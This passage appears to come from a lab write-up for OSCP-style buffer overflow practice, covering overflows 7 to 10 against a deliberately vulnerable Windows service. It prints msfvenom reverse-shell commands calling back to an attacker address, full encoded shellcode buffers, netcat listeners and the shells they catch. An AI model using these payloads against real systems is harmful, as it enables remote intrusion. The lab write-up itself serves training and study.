f5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow7$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x8c\xae\xbe\xfb" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xda\xd6\xd9\x74\x24\xf4\x5a\x31\xc9\xbd\x33\x75\xfe"
buf += b"\xf1\xb1\x52\x31\x6a\x17\x03\x6a\x17\x83\xd9\x89\x1c"
buf += b"\x04\xe1\x9a\x63\xe7\x19\x5b\x04\x61\xfc\x6a\x04\x15"
buf += b"\x75\xdc\xb4\x5d\xdb\xd1\x3f\x33\xcf\x62\x4d\x9c\xe0"
buf += b"\xc3\xf8\xfa\xcf\xd4\x51\x3e\x4e\x57\xa8\x13\xb0\x66"
buf += b"\x63\x66\xb1\xaf\x9e\x8b\xe3\x78\xd4\x3e\x13\x0c\xa0"
buf += b"\x82\x98\x5e\x24\x83\x7d\x16\x47\xa2\xd0\x2c\x1e\x64"
buf += b"\xd3\xe1\x2a\x2d\xcb\xe6\x17\xe7\x60\xdc\xec\xf6\xa0"
buf += b"\x2c\x0c\x54\x8d\x80\xff\xa4\xca\x27\xe0\xd2\x22\x54"
buf += b"\x9d\xe4\xf1\x26\x79\x60\xe1\x81\x0a\xd2\xcd\x30\xde"
buf += b"\x85\x86\x3f\xab\xc2\xc0\x23\x2a\x06\x7b\x5f\xa7\xa9"
buf += b"\xab\xe9\xf3\x8d\x6f\xb1\xa0\xac\x36\x1f\x06\xd0\x28"
buf += b"\xc0\xf7\x74\x23\xed\xec\x04\x6e\x7a\xc0\x24\x90\x7a"
buf += b"\x4e\x3e\xe3\x48\xd1\x94\x6b\xe1\x9a\x32\x6c\x06\xb1"
buf += b"\x83\xe2\xf9\x3a\xf4\x2b\x3e\x6e\xa4\x43\x97\x0f\x2f"
buf += b"\x93\x18\xda\xe0\xc3\xb6\xb5\x40\xb3\x76\x66\x29\xd9"
buf += b"\x78\x59\x49\xe2\x52\xf2\xe0\x19\x35\xf7\xf2\x2f\x6d"
buf += b"\x6f\xf9\x2f\x73\x1c\x74\xc9\xe1\xcc\xd0\x42\x9e\x75"
buf += b"\x79\x18\x3f\x79\x57\x65\x7f\xf1\x54\x9a\xce\xf2\x11"
buf += b"\x88\xa7\xf2\x6f\xf2\x6e\x0c\x5a\x9a\xed\x9f\x01\x5a"
buf += b"\x7b\xbc\x9d\x0d\x2c\x72\xd4\xdb\xc0\x2d\x4e\xf9\x18"
buf += b"\xab\xa9\xb9\xc6\x08\x37\x40\x8a\x35\x13\x52\x52\xb5"
buf += b"\x1f\x06\x0a\xe0\xc9\xf0\xec\x5a\xb8\xaa\xa6\x31\x12"
buf += b"\x3a\x3e\x7a\xa5\x3c\x3f\x57\x53\xa0\x8e\x0e\x22\xdf"
buf += b"\x3f\xc7\xa2\x98\x5d\x77\x4c\x73\xe6\x97\xaf\x51\x13"
buf += b"\x30\x76\x30\x9e\x5d\x89\xef\xdd\x5b\x0a\x05\x9e\x9f"
buf += b"\x12\x6c\x9b\xe4\x94\x9d\xd1\x75\x71\xa1\x46\x75\x50"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~/Documents/bufferoverflow$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~/Documents/bufferoverflow$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.213.67] 49259
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 8

Kick off the fuzzer.py against the target IP.

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow/overflow8$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow8$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x1d\x2e\xc7\xee" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xb8\x7f\xf0\xfd\xfe\x5f\x2b"
buf += b"\xc9\xb1\x52\x31\x47\x17\x83\xef\xfc\x03\x38\xe3\x1f"
buf += b"\x0b\x3a\xeb\x62\xf4\xc2\xec\x02\x7c\x27\xdd\x02\x1a"
buf += b"\x2c\x4e\xb3\x68\x60\x63\x38\x3c\x90\xf0\x4c\xe9\x97"
buf += b"\xb1\xfb\xcf\x96\x42\x57\x33\xb9\xc0\xaa\x60\x19\xf8"
buf += b"\x64\x75\x58\x3d\x98\x74\x08\x96\xd6\x2b\xbc\x93\xa3"
buf += b"\xf7\x37\xef\x22\x70\xa4\xb8\x45\x51\x7b\xb2\x1f\x71"
buf += b"\x7a\x17\x14\x38\x64\x74\x11\xf2\x1f\x4e\xed\x05\xc9"
buf += b"\x9e\x0e\xa9\x34\x2f\xfd\xb3\x71\x88\x1e\xc6\x8b\xea"
buf += b"\xa3\xd1\x48\x90\x7f\x57\x4a\x32\x0b\xcf\xb6\xc2\xd8"
buf += b"\x96\x3d\xc8\x95\xdd\x19\xcd\x28\x31\x12\xe9\xa1\xb4"
buf += b"\xf4\x7b\xf1\x92\xd0\x20\xa1\xbb\x41\x8d\x04\xc3\x91"
buf += b"\x6e\xf8\x61\xda\x83\xed\x1b\x81\xcb\xc2\x11\x39\x0c"
buf += b"\x4d\x21\x4a\x3e\xd2\x99\xc4\x72\x9b\x07\x13\x74\xb6"
buf += b"\xf0\x8b\x8b\x39\x01\x82\x4f\x6d\x51\xbc\x66\x0e\x3a"
buf += b"\x3c\x86\xdb\xed\x6c\x28\xb4\x4d\xdc\x88\x64\x26\x36"
buf += b"\x07\x5a\x56\x39\xcd\xf3\xfd\xc0\x86\xf1\x07\xc4\xfe"
buf += b"\x6e\x0a\xd8\xe0\x02\x83\x3e\x76\xcb\xc5\xe9\xef\x72"
buf += b"\x4c\x61\x91\x7b\x5a\x0c\x91\xf0\x69\xf1\x5c\xf1\x04"
buf += b"\xe1\x09\xf1\x52\x5b\x9f\x0e\x49\xf3\x43\x9c\x16\x03"
buf += b"\x0d\xbd\x80\x54\x5a\x73\xd9\x30\x76\x2a\x73\x26\x8b"
buf += b"\xaa\xbc\xe2\x50\x0f\x42\xeb\x15\x2b\x60\xfb\xe3\xb4"
buf += b"\x2c\xaf\xbb\xe2\xfa\x19\x7a\x5d\x4d\xf3\xd4\x32\x07"
buf += b"\x93\xa1\x78\x98\xe5\xad\x54\x6e\x09\x1f\x01\x37\x36"
buf += b"\x90\xc5\xbf\x4f\xcc\x75\x3f\x9a\x54\x95\xa2\x0e\xa1"
buf += b"\x3e\x7b\xdb\x08\x23\x7c\x36\x4e\x5a\xff\xb2\x2f\x99"
buf += b"\x1f\xb7\x2a\xe5\xa7\x24\x47\x76\x42\x4a\xf4\x77\x47"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.109.97] 49286
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 9

Kick off the fuzzer.py against the target IP.

kali@kali:~/Documents/bufferoverflow/overflow9$ python ../fuzzer.py 
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing with 800 bytes
Fuzzing with 900 bytes
Fuzzing with 1000 bytes
Fuzzing with 1100 bytes
Fuzzing with 1200 bytes
Fuzzing with 1300 bytes
Fuzzing with 1400 bytes
Fuzzing with 1500 bytes
Fuzzing with 1600 bytes
Could not connect to 10.10.109.97:1337

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow/overflow9$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow9$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x04\x3e\x3f\xe1" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xd9\xf6\xd9\x74\x24\xf4\x5a\xb8\xca\x01\x9e\x32\x33"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x13\x03\x88\x12\x7c"
buf += b"\xc7\xf0\xfd\x02\x28\x08\xfe\x62\xa0\xed\xcf\xa2\xd6"
buf += b"\x66\x7f\x13\x9c\x2a\x8c\xd8\xf0\xde\x07\xac\xdc\xd1"
buf += b"\xa0\x1b\x3b\xdc\x31\x37\x7f\x7f\xb2\x4a\xac\x5f\x8b"
buf += b"\x84\xa1\x9e\xcc\xf9\x48\xf2\x85\x76\xfe\xe2\xa2\xc3"
buf += b"\xc3\x89\xf9\xc2\x43\x6e\x49\xe4\x62\x21\xc1\xbf\xa4"
buf += b"\xc0\x06\xb4\xec\xda\x4b\xf1\xa7\x51\xbf\x8d\x39\xb3"
buf += b"\xf1\x6e\x95\xfa\x3d\x9d\xe7\x3b\xf9\x7e\x92\x35\xf9"
buf += b"\x03\xa5\x82\x83\xdf\x20\x10\x23\xab\x93\xfc\xd5\x78"
buf += b"\x45\x77\xd9\x35\x01\xdf\xfe\xc8\xc6\x54\xfa\x41\xe9"
buf += b"\xba\x8a\x12\xce\x1e\xd6\xc1\x6f\x07\xb2\xa4\x90\x57"
buf += b"\x1d\x18\x35\x1c\xb0\x4d\x44\x7f\xdd\xa2\x65\x7f\x1d"
buf += b"\xad\xfe\x0c\x2f\x72\x55\x9a\x03\xfb\x73\x5d\x63\xd6"
buf += b"\xc4\xf1\x9a\xd9\x34\xd8\x58\x8d\x64\x72\x48\xae\xee"
buf += b"\x82\x75\x7b\xa0\xd2\xd9\xd4\x01\x82\x99\x84\xe9\xc8"
buf += b"\x15\xfa\x0a\xf3\xff\x93\xa1\x0e\x68\x96\x33\x1e\xc0"
buf += b"\xce\x39\x1e\x0e\x63\xb7\xf8\x44\x6b\x91\x53\xf1\x12"
buf += b"\xb8\x2f\x60\xda\x16\x4a\xa2\x50\x95\xab\x6d\x91\xd0"
buf += b"\xbf\x1a\x51\xaf\x9d\x8d\x6e\x05\x89\x52\xfc\xc2\x49"
buf += b"\x1c\x1d\x5d\x1e\x49\xd3\x94\xca\x67\x4a\x0f\xe8\x75"
buf += b"\x0a\x68\xa8\xa1\xef\x77\x31\x27\x4b\x5c\x21\xf1\x54"
buf += b"\xd8\x15\xad\x02\xb6\xc3\x0b\xfd\x78\xbd\xc5\x52\xd3"
buf += b"\x29\x93\x98\xe4\x2f\x9c\xf4\x92\xcf\x2d\xa1\xe2\xf0"
buf += b"\x82\x25\xe3\x89\xfe\xd5\x0c\x40\xbb\xf6\xee\x40\xb6"
buf += b"\x9e\xb6\x01\x7b\xc3\x48\xfc\xb8\xfa\xca\xf4\x40\xf9"
buf += b"\xd3\x7d\x44\x45\x54\x6e\x34\xd6\x31\x90\xeb\xd7\x13"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.109.97] 49298
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 10

Kick off the fuzzer.py against the target IP.

kali@kali:~/Documents/bufferoverflow/overflow10$ python ../fuzzer.py 
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Could not connect to 10.10.80.206:1337

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow/overflow10$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow10$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\xa0\xad\xbe\xde\xef" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
